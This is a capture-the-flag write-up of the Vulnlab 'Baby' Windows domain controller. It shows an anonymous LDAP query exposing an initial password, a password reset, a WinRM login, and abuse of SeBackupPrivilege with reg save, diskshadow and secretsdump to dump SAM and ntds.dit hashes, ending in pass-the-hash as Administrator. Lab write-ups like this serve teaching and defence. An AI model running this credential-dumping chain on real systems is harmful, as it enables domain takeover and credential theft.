Baby is an Easy windows machine from Vulnlab, in which we start with ldapsearch and get a users password from a description and after resetting that users password we will be able to login to winrm and setbackup priv is enabled for that user and we will dump sam and system from machine,
➜ Baby nmap -v -Pn 10.10.96.24 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-08 06:35 EDT Initiating Parallel DNS resolution of 1 host. at 06:35 Completed Parallel DNS resolution of 1 host. at 06:35, 0.00s elapsed Initiating SYN Stealth Scan at 06:35 Scanning 10.10.96.24 [1000 ports] Discovered open port 139/tcp on 10.10.96.24 Discovered open port 135/tcp on 10.10.96.24 Discovered open port 3389/tcp on 10.10.96.24 Discovered open port 53/tcp on 10.10.96.24 Discovered open port 445/tcp on 10.10.96.24 Discovered open port 464/tcp on 10.10.96.24 Discovered open port 636/tcp on 10.10.96.24 Discovered open port 5357/tcp on 10.10.96.24 Discovered open port 389/tcp on 10.10.96.24 Discovered open port 593/tcp on 10.10.96.24 Discovered open port 3268/tcp on 10.10.96.24 Discovered open port 88/tcp on 10.10.96.24 Discovered open port 3269/tcp on 10.10.96.24 Completed SYN Stealth Scan at 06:35, 8.44s elapsed (1000 total ports) Nmap scan report for 10.10.96.24 Host is up (0.16s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5357/tcp open wsdapi
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds Raw packets sent: 1990 (87.560KB) | Rcvd: 16 (704B) ➜ Baby
Ldapsearch
Ldapsearch performs an anonymous LDAP query to the LDAP server at 10.10.96.24, searching for all available objects under the domain baby.vl.
By grepping for “pass” in the output, we found a description revealing an initial password:
1 2 3 4
➜ Baby cat ldap_out | grep pass description: Members in this group can have their passwords replicated to all description: Members in this group cannot have their passwords replicated to a description: Set initial password to `BabyStart123!`
Pass: BabyStart123!
Got a potential password, so checked if it works for any users. Using CME, got a hit on Caroline.Robinson:
I tested the password BabyStart123! using CME and found it valid for Caroline.Robinson, but the password had to be changed. Using smbpasswd, I updated it to Sebin#321.
1 2 3 4 5 6
➜ Baby smbpasswd -r 10.10.96.24 -U Caroline.Robinson Old SMB password: BabyStart123! New SMB password: Sebin#321 Retype new SMB password: Sebin#321 Password changed for user Caroline.Robinson ➜ Vulnlab
➜ Baby evil-winrm -i 10.10.96.24 -u Caroline.Robinson -p 'Sebin#321' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> dir
Directory: C:\Users\Caroline.Robinson\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website -a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website -a---- 11/21/2021 3:24 PM 36 user.txt
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> type user.txt VL{b2c6150b85125xxxxxxxxb253df9540d898} *Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop>
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cd c:\
Caroline.Robinson has SeBackupPrivilege, which allows us to back up files, including the SAM and SYSTEM hives. These contain password hashes, which can be extracted to escalate privileges.
Using SeBackupPrivilege, we successfully backed up and downloaded the SAM and SYSTEM registry hives. These will allow us to extract password hashes for privilege escalation.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cd c:\ *Evil-WinRM* PS C:\> mkdir Temp
Directory: C:\
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/8/2024 10:59 AM Temp
*Evil-WinRM* PS C:\> *Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam The operation completed successfully. *Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system The operation completed successfully. *Evil-WinRM* PS C:\temp> download system Info: Downloading C:\temp\system to system Info: Download successful! *Evil-WinRM* PS C:\Temp> download sam Info: Downloading C:\Temp\sam to sam Info: Download successful! *Evil-WinRM* PS C:\Temp>
After downloading the SAM and SYSTEM hives, we used impacket-secretsdump to extract password hashes. We successfully retrieved the NTLM hash for the Administrator account, which can be used for further privilege escalation.
1 2 3 4 5 6 7 8 9 10 11
➜ Baby impacket-secretsdump -sam sam -system system local Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up... ➜ Baby
The extracted NTLM hash belongs to the local Administrator account, which means it won’t work for domain authentication. To gain access as a Domain Admin, we need to dump the ntds.dit file, which contains all domain user hashes. Since we have SeBackupPrivilege, we can leverage it to extract the NTDS database and escalate further.
1 2 3 4 5 6 7 8 9 10 11 12 13 14
➜ Baby evil-winrm -i 10.10.96.24 -u Administrator -H 8d992faed38128ae85e95fa35868bb43 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1 ➜ Baby
Understanding Local vs. Domain NT Hashes in Windows Authentication
When dumping hashes from a Windows machine, you may extract credentials from two sources: SAM (Security Account Manager) and NTDS.dit (Active Directory database). While both contain NT hashes, they serve different authentication purposes.
SAM Hashes: Stored locally and used for non-domain accounts. These hashes cannot be used for domain authentication.
NTDS.dit Hashes: Contain credentials for Active Directory users. These hashes can be used for Pass-the-Hash (PtH) attacks on domain-joined machines.
If you can’t authenticate using a SAM-extracted hash but succeed with an NTDS.dit hash, it’s because domain authentication requires the NTDS.dit hash, while SAM hashes are only valid for local logins.
This diskshadow script creates a persistent shadow copy of the C: drive and mounts it as Z:, allowing access to sensitive files like ntds.dit. The unix2dos command converts a Unix-format text file to DOS/Windows format by replacing line endings (LF → CRLF), ensuring compatibility when transferring scripts to Windows systems.
1 2 3 4 5 6 7 8
➜ Baby unix2dos seb.dsh unix2dos: converting file seb.dsh to DOS format... ➜ Baby cat seb.dsh set context persistent nowriters add volume c: alias seb create expose %seb% z: ➜ Baby
After running the script with DiskShadow, we successfully exposed the C: drive as Z: and retrieved the ntds.dit file, which contains Active Directory password hashes.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
*Evil-WinRM* PS C:\Temp> ls Directory: C:\Temp
Mode LastWriteTime Length Name --------------------------- -a----10/8/202411:17 AM 6132024-10-08_11-17-52_BABYDC.cab -a----10/8/202410:33 AM 16777216 ntds.dit -a----10/8/202411:00 AM 49152 sam -a----10/8/202411:17 AM 84 seb.dsh -a----10/8/202411:00 AM 16633856 system *Evil-WinRM* PS C:\Temp> download ntds.dit Info: Downloading C:\Temp\ntds.dit to ntds.dit Info: Download successful! *Evil-WinRM* PS C:\Temp>
Use impacket-secretsdump we can dump hashes of both domain and local.
➜ Baby evil-winrm -i 10.10.96.24 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
With the extracted NTLM hash, we successfully authenticated as the Administrator using Evil-WinRM, gaining full access to the target machine.
